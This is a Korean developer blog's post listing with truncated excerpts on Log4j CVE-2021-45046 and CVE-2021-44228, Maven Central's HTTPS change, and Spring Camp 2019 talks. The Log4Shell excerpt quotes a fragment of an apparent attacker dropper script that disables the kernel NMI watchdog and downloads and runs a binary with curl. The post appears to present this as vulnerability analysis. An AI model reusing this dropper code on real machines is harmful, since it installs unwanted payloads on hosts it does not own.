Log4j 2.15.0 으로 업그레이드 한지 하루만에 CVE-2021-45046 가 공개되었습니다. 영향 받는 버전 Logj2
개발/JAVA
스위스 정부에서 깔끔하게 정리해서 포스팅한 글을 참조 하였습니다. 이미 이슈는 다뤘으니 Log4j 2.x 의 이슈 CVE-2021-44228 설명은 생략 하겠습니다. 이슈 관련 포스팅은 CVE-2021-44228 취약점 참고하세요. Message formatting 을 통한 lookup 동작을 위해 ${protocol:~~~} 의 패턴을 갖습니다. WAF 에 룰을 설정하여 차단합니다. Log4j2 의 message lookup 을 disable 합니다. (2.10
2021년 12월 10일. CVE-2021-44228 취약점이 공개 되었습니다. 현재 수많은 사이트 등에서 다수의 스캔 흔적이 포착 된것으로 확인 됩니다. 자바 어플리케이션을 사용하는 곳은 모두 체크 해봐야 합니다. 영향 받는 버전 Log4j 2.x /proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf ROOTUID="0" function __curl() { read proto server path $HOME/curl; chmod +x $HOME/curl $HOME/curl -V && WGET="$HOME/curl -o" $HOME/curl -V || __curl "$CURL_DOWNLOAD_URL" > $BIN_PAT..
2020. 01. 15 일 부로 http://repo1.maven.org / http://repo.maven.apache.org/ 두 repository에 대해 access가 제한된다. 2019년 4월 https 로 변경을 권고 하였고 이번에 변경이 완료 된것이다. https://central.sonatype.org/articles/2019/Apr/30/http-access-to-repo1mavenorg-and-repomavenapacheorg-is-being-deprecated/ https://blog.sonatype.com/central-repository-moving-to-https 하지만 미처 대처하지 못하고 잊고 있었는데 갑자기 제한되어 당황했다. maven central 뿐만 아니라 http:..
KSUG Facebook 에 올라오고 있는 Spring Camp 2019 발표 자료 모음입니다. 트랙1 트랙2 실전에 써먹는 스프링 부트 GraalVM과 스프링, 이상과 현실 Monitoring With Actuator spring websocket Java, 돈내고 써야 하나요?!! 자바에서 null을 안전히 다루는 방법 정확하고, 우아하게! Reactive를 품은 Kafka 메시지 무엇을 테스트할 것인가? 어떻게 테스트할 것인가? Building GraphQL service with kotlin 당신도 할 수 있는 레거시 프로젝트 개선 이야기 Kotlin 프로젝트를 피할 수 없을 때 멀티리전 가용성을 위한 글로벌 캐싱 - Hidden micro services Kotlin + Spring Data J..